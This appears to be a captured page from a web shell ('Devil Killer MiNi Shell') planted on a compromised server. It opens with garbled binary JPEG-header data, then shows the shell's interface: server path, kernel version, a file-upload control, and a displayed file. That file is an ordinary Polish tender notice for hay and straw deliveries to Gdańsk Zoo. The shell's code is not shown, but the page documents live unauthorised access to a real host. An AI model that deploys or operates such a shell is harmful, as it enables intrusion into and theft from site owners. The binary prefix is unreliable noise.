JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240514/0032293701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa siana i słomy do Gdańskiego Ogrodu Zoologicznego w latach 2024-2025 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gdański Ogród Zoologiczny</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 190560361</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Karwieńska 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-328</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">jbarton@zoo.gda.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zoo.gda.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa siana i słomy do Gdańskiego Ogrodu Zoologicznego w latach 2024-2025 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-01753057-11d8-11ef-9381-e6cc5d6d04e5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00322937</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00032472/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 Dostawa siana, słomy, lucerny, pęczków gałęzi</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/zoo_gda <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Przedmiotowe postępowanie prowadzone jest przy uzyciu śordków komunikacji elektronicznej za wyjatkiem złożenia próbek służących ocenie jakości oferowanego przedmiotu zamówienia. Składanie ofert następuje za pośrednictwem platformy zakupowej dostępnej pod adresem https://platformazakupowa.pl/pn/zoo_gda, próbki należy dostarczyc do siedziby zamawiającego</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformy zakupowej (dalej jako „Platforma”) pod adresem: https://platformazakupowa.pl/pn/zoo_gda <br/>3.	W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem www.platformazakupowa.pl i formularza „Wyślij wiadomość do Zmawiającego” po których pojawi się komunikat ,że wiadomość została wysłana do Zamawiającego.<br/>4. Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem www.platformazakupowa.pl . Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji „Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego Wykonawcy.<br/>5. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości przesłanych przez Zamawiającego bezpośrednio na: https://platformazakupowa.pl/pn/zoo_gda , gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/> a) Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do złożenia i wycofania oraz do komunikacji wynosi 150 MB , <br/> Za datę złożenia oferty przyjmuje się datę jej przekazania w systemie (platformie) w drugim kroku składania oferty poprzez kliknięcie przycisku “Złóż ofertę” i wyświetlenie się komunikatu, że oferta została zaszyfrowana i złożona.<br/>1) Zamawiający rekomenduje wykorzystanie formatów: pdf, doc. xls, jpg,<br/>2) w celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: zip i 7z.<br/>11. Instrukcje opisujące sposób korzystania z platformyzakupowej.pl znajdują się na stronie https://platformazakupowa.pl/strona/46-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.10.) Przyczyny odstąpienia od komunikacji elektronicznej: </h3> <p class="mb-0">zamawiający wymaga przedstawienia modelu fizycznego, modelu w skali lub próbki, których nie można przekazać przy użyciu środków komunikacji elektronicznej (art. 65 ust. 1 pkt 4 ustawy)</p> <h3 class="mb-0">3.11.) Sposób nieelektronicznego składania ofert, wniosków, oświadczeń oraz innych dokumentów: <span class="normal">ofertę, wnioski, oświadczenia nalezy składac elektronicznie za pośrednictwem platformy zakupowej zgodnie z wytycznymi wskazanymi w SWZ, wyjatkiem jest złożenie próbek oferowanego przedmiotu zamówienia. Próbki w celu oceny jakości zgodnie z opisem w zał nr. 7 do SWZ należy dostarczyc za pośrednictwem operatora pocztowego, poczty kurierskiej lub osobiście do siedziby Zmawiajacego : Gdański Ogród Zoologiczny, ul. Karwieńska 3 ( budynek administracji pok. nr 3). Próbka musi byc złozona do upływu terminu wskazanego na składanie ofert</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">rozdz. XXII SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.D.271.6.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 565600 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 565000 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Siano balotowane<br/>CPV 03114200-5<br/>Część pierwsza - siano<br/><br/>Zadanie 1. Siano łąkowe <br/>1.1 Siano łąkowe balotowane (mieszanka inna niż zadanie 2)<br/>Przewidywane zapotrzebowanie: 120 t <br/>1.2 Siano łąkowe – sieczka (3-5 cm)<br/>Przewidywane zapotrzebowanie: 50 kg<br/><br/>Zadanie 2. Siano łąkowe balotowane (mieszanka inna niż zadanie 1)<br/>Przewidywane zapotrzebowanie: 120 t<br/><br/>Zadanie 3. Siano balotowane:<br/>3.1 Mieszanka traw i roślin motylkowych (lucerna lub koniczyna, 20-30%)<br/>Przewidywane zapotrzebowanie: 100 t<br/>3.2 Lucerna 50 t<br/>Przewidywane zapotrzebowanie: 50 t<br/>3.3 Koniczyna czerwona<br/>Przewidywane zapotrzebowanie: 20 t<br/><br/>Realizacja dostaw zadań 1-3:<br/>•	Terminy realizacji dostaw: od czerwca 2024 roku do 30 kwietnia 2025 roku.<br/>•	Siano musi być dostarczane do magazynu Zamawiającego w Gdańsku - Oliwie przy ul. Karwieńskiej 3 transportem Dostawcy wraz z wyładowaniem do stodoły. <br/>•	Wielkość dostawy musi być uzgodniona każdorazowo z działem zaopatrzenia GOZ.<br/>•	Siano w trakcie transportu musi być zabezpieczone przed działaniem czynników zewnętrznych (wilgocią, zabrudzeniem, zwierzętami). <br/>•	Do każdej dostawy wymagany jest kwit wagowy.<br/><br/>Wymagania zamawiającego do zadań 1-3:<br/>1.	Siano musi spełniać następujące wymagania jakościowe:<br/>a.	posiadać właściwy, swoisty kolor; zastrzega się nieprzyjęcie siana w odcieniach koloru szarego, brunatnego;<br/>b.	posiadać swoisty zapach; niedopuszczalny jest zapach: pleśni, stęchły, kurzu, żerowania gryzoni i inne uznane w przypadku siana za obce;<br/>c.	być suche (wilgotność nie może przekraczać 15%); w przypadku wątpliwości w ocenie organoleptycznej Zamawiający ma prawo dokonać pomiaru wilgotności siana przy użyciu miernika wilgotności będącego w posiadaniu Zamawiającego lub zbadać próbkę siana z dnia dostawy w laboratorium. W przypadku zbyt dużej wilgotności stwierdzonej podczas pomiaru miernikiem wilgotności Zamawiający ma prawo zwrócić takie siano. W przypadku ponadnormatywnego wyniku analizy laboratoryjnej Zamawiający ma prawo zwrócić partię siano w ciągu 5 dni roboczych od dnia dostawy;<br/>d.	być czyste, wolne od zanieczyszczeń organicznych i mineralnych (m.in.: piach/gleba, błoto, kamienie, szkodniki, odchody gryzoni, itp.); zamawiający zastrzega sobie prawo do nieprzyjęcia siana silnie kurzącego się;<br/>e.	być wolne od innych zanieczyszczeń niepożądanych, takich jak: sznurki, folie, papier, druty, plastik itp. z pominięciem pojedynczych przypadków;<br/>f.	być wolne od porażenia grzybami pleśniowymi (niedopuszczalne są wszelkie ogniska i naloty pleśniowe). W przypadku wątpliwości w ocenie organoleptycznej Zamawiający zastrzega sobie prawo pobrania prób siana w dniu dostawy lub w ciągu 3 dni po dostawie i analizy zawartości grzybów oraz ich metabolitów w laboratorium i w przypadku wyników niekorzystnych zwrotu dostarczonej partii w ciągu 14 dni kalendarzowych<br/>g.	być wolne od roślin uznanych za niepożądane (trujących), w tym także turzyc;<br/>h.	powinno pochodzić z traw koszonych do początków kwitnienia gatunków traw przewodnich, w przypadku roślin motylkowych w fazie zawiązywania pąków do pełnego pączkowania (niedopuszczalne jest siano z roślin koszonych w zaawansowanej fazie kwitnienia lub po zakończeniu kwitnienia, silnie zdrewniałe, z dużym udziałem grubych, sztywnych pędów kwiatostanowych). Zamawiający zastrzega sobie prawo pobrania próbek w dniu dostawy lub do 5 dni po dostawie i określania ilości frakcji włókna ADF. W przypadku wartości powyżej 40% w s.m. ma prawo zwrotu wymiany dostarczonej partii w ciągu 14 dni kalendarzowych od dostawy i jej wymiany;<br/>i.	zadanie 1 i 2: siano musi być mieszanką minimum 5 traw (inną dla zadania 1 oraz zadania 2); <br/>j.	zadanie 1, 2: w składzie botanicznym muszą dominować trawy (min. 90%) w tym gatunki takie jak kupkówka pospolita, życica wielokwiatowa, tymotka łąkowa, życica trwała, kostrzewa czerwona, kostrzewa łąkowa, wiechlina łąkowa, wyczyniec łąkowy, stokłosa bezostna, mietlica biaława oraz zioła łąkowe (m.in.: babka lancetowata, krwawnik pospolity, mniszek lekarski, komonica zwyczajna); <br/>k.	zadanie 3 (dot. mieszanki traw i roślin motylkowych): 70-80% składu botanicznego powinny stanowić gatunki traw takie jak kupkówka pospolita, życica wielokwiatowa, tymotka łąkowa, życica trwała, kostrzewa czerwona, kostrzewa łąkowa, wiechlina łąkowa, wyczyniec łąkowy, stokłosa bezostna, mietlica biaława; 20-30% składu botanicznego powinny stanowić rośliny motylkowe (m.in.: koniczyna łąkowa, szwedzka, biała, lucerna);<br/>l.	zadanie 3 (dot. lucerny oraz koniczyny czerwonej): min. 90% składu botanicznego siana powinny stanowić odpowiednio lucerna lub koniczyna czerwona;<br/>m.	jakość dostarczanego siana będzie objęta stałymi nadzorem ze strony Zamawiającego, przez jego przedstawicieli, przez cały okres trwania umowy;<br/>n.	w przypadku niespełnienia powyższych kryteriów jakości Zamawiający zastrzega sobie prawo do nieprzyjęcia siana.<br/>2.	W ramach 1, 2 oraz 3 zadania wymagany jest jeden producent (na każde z zadań).<br/>3.	Łąki przeznaczone pod uprawę powinny być położone z dala od ośrodków przemysłowych oraz dróg przelotowych i lotnisk, nie mogą być położone na terenach podmokłych.<br/>4.	Nawozy mineralne mogą być stosowane w minimalnych, niezbędnych ilościach.<br/>5.	Pojedynczy balot powinien mieć masę ok. 10-20 kg, wymiary ok.40x50x80 cm; siano łąkowe w postaci sieczki powinno być dostarczane w workach o masie 5-10 kg.<br/>6.	Siano do czasu przywozu do GOZ musi być odpowiednio zabezpieczone przed opadami atmosferycznymi (stodoły, magazyny wentylowane).<br/>7.	Zamawiający ma prawo zlecić wykonanie badań, m.in. mikrobiologicznych i na pozostałości środków ochrony roślin, w przypadku zastrzeżeń do jakości przedmiotu dostawy. Wynik badania niekorzystny dla Wykonawcy zobowiązuje go do opłaty badań. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03114200-5 - Siano</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">ocena jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część druga - Słoma<br/>CPV 03.11.41.00-4<br/><br/>Zadanie 4. Słoma<br/>4.1 Słoma balotowana owsiana<br/>Przewidywane zapotrzebowanie: 13 000 kg<br/>4.2 Słoma balotowana pszenna<br/>Przewidywane zapotrzebowanie: 13 000 kg<br/>4.3 Słoma balotowana jęczmienna:<br/>Przewidywane zapotrzebowanie: 10 000 kg<br/>4.4 Słoma owsiana – sieczka (2-3 cm)<br/>Przewidywane zapotrzebowanie: 5 000 kg <br/>4.5 Słoma balotowana – dowóz do Schroniska dla bezdomnych zwierząt <br/>w Gdańsku - Kokoszkach ul. Przyrodników 14 <br/>Przewidywane zapotrzebowanie: 600 kg<br/><br/>Realizacja dostaw dla zadania 4:<br/>•	Terminy realizacji dostaw: od czerwca 2024 roku do 30 kwietnia 2025 roku.<br/>•	Realizacja dostaw następować będzie, w terminach uzgodnionych z zaopatrzeniem GOZ oraz Schroniska, do magazynu Zamawiającego wraz z wyładowaniem. <br/>•	Do każdej dostawy wymagany jest kwit wagowy.<br/>•	Wielkość dostawy musi być uzgodniona każdorazowo z działem zaopatrzenia GOZ oraz Schroniska.<br/>•	Słoma w trakcie transportu musi być zabezpieczona przed działaniem czynników zewnętrznych (wilgocią, zabrudzeniem, zwierzętami). <br/><br/>Wymagania zamawiającego do zadań 4:<br/>1.	Słoma musi spełniać następujące wymagania jakościowe:<br/>a.	charakteryzować się wyraźnym żółto-złotym kolorem, niedopuszczalna jest słoma w odcieniach brązowawych, szarości oraz słoma z dużym udziałem zielonych źdźbeł traw;<br/>b.	charakteryzować się swoistym dla słomy zapachem (odpowiednio owsianej lub pszennej) – niedopuszczalny jest zapach: pleśni, stęchły, kurzu i inne obce;<br/>c.	być sucha (wilgotność nie powinna przekraczać 18%); w przypadku wątpliwości w ocenie organoleptycznej Zamawiający ma prawo dokonać pomiaru wilgotności słomy przy użyciu miernika wilgotności będącego w posiadaniu Zamawiającego lub zbadać próbkę słomy z dnia dostawy w laboratorium;<br/>d.	być czysta, wolna od zanieczyszczeń organicznych i mineralnych (m.in.: piach, ziemia, błoto, szkodniki, odchody gryzoni);<br/>e.	być wolna od innych zanieczyszczeń niepożądanych, takich jak: sznurki, folie, papier, druty, plastik itp. z pominięciem pojedynczych przypadków;<br/>f.	być wolna od porażenia grzybami pleśniowymi (niedopuszczalne są wszelkie ogniska i naloty pleśniowe) – Zamawiający ma prawo zwrócić takie kostki lub całą dostarczoną partię. W przypadku wątpliwości w ocenie organoleptycznej Zamawiający zastrzega sobie prawo pobrania prób słomy w ciągu 3 dni od dnia dostawy i analizy zawartości grzybów oraz ich metabolitów w laboratorium i w przypadku wyników niekorzystnych zwrotu dostarczonej partii w ciągu 14 dni kalendarzowych;<br/>g.	musi być wolna od roślin uznanych za niepożądane (trujące);<br/>h.	zadanie 4.1 – 4.4: słoma nie powinna zawierać zbóż gatunków innych niż owies, jęczmień lub pszenica (odpowiednio dla poszczególnych punktów); Zamawiający zastrzega sobie prawo nie przyjęcia słomy mieszanej, z dużym udziałem innych zbóż; <br/>i.	jakość dostarczanej słomy będzie objęta stałymi nadzorem ze strony Zamawiającego, przez jego przedstawicieli, przez cały okres trwania umowy;<br/>j.	w przypadku niespełnienia powyższych kryteriów jakości Zamawiający zastrzega sobie prawo do nieprzyjęcia siana.<br/>2.	Pojedynczy balot powinien mieć masę ok. 10-20 kg, wymiary ok.40x50x80 cm; słoma w postaci sieczki powinna być dostarczana w workach o masie 5-10 kg.<br/>3.	Słoma do czasu przywozu do GOZ/Schroniska musi być odpowiednio zabezpieczona przed opadami atmosferycznymi (stodoły, magazyny wentylowane).<br/>4.	Zamawiający ma prawo zlecić wykonanie badań, m.in. mikrobiologicznych i na pozostałości środków ochrony roślin, w przypadku zastrzeżeń do jakości przedmiotu dostawy. Wynik badania niekorzystny dla Wykonawcy zobowiązuje go do opłaty badań. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03114100-4 - Słoma</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">ocena jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 